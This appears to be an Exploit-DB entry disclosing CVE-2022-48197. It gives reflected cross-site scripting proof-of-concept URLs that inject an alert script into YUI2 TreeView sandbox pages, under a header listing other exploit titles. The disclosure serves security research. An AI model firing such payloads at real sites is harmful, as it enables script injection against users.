3de26153c8
23 changes to exploits/shellcodes/ghdb ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS) Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated) TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) GeoVision Camera GV-ADR2701 - Authentication Bypass AD Manager Plus 7122 - Remote Code Execution (RCE) Enlightenment v0.25.3 - Privilege escalation Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) Apache 2.4.x - Buffer Overflow perfSONAR v4.4.5 - Partial Blind CSRF SugarCRM 12.2.0 - Remote Code Execution (RCE) XCMS v1.83 - Remote Command Execution (RCE) Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Splashtop 8.71.12001.0 - Unquoted Service Path Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) FlipRotation v1.0 decoder - Shellcode (146 bytes) Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes) macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode
34 lines
No EOL
1.9 KiB
Text
34 lines
No EOL
1.9 KiB
Text
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
|
|
# Google Dork: N/A
|
|
# Date: 2/1/2023
|
|
# Exploit Author: Rian Saaty
|
|
# Vendor Homepage: https://yui.github.io/yui2/
|
|
# Software Link: https://yui.github.io/yui2/
|
|
# Version: 2.8.2
|
|
# Tested on: MacOS, WindowsOS, LinuxOS
|
|
# CVE : CVE-2022-48197
|
|
|
|
|
|
The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
|
|
most files. A sample of the vulnerable files along with the exploit
|
|
can be found here:
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
|
|
|
|
Twitter: @Ryan_412_ |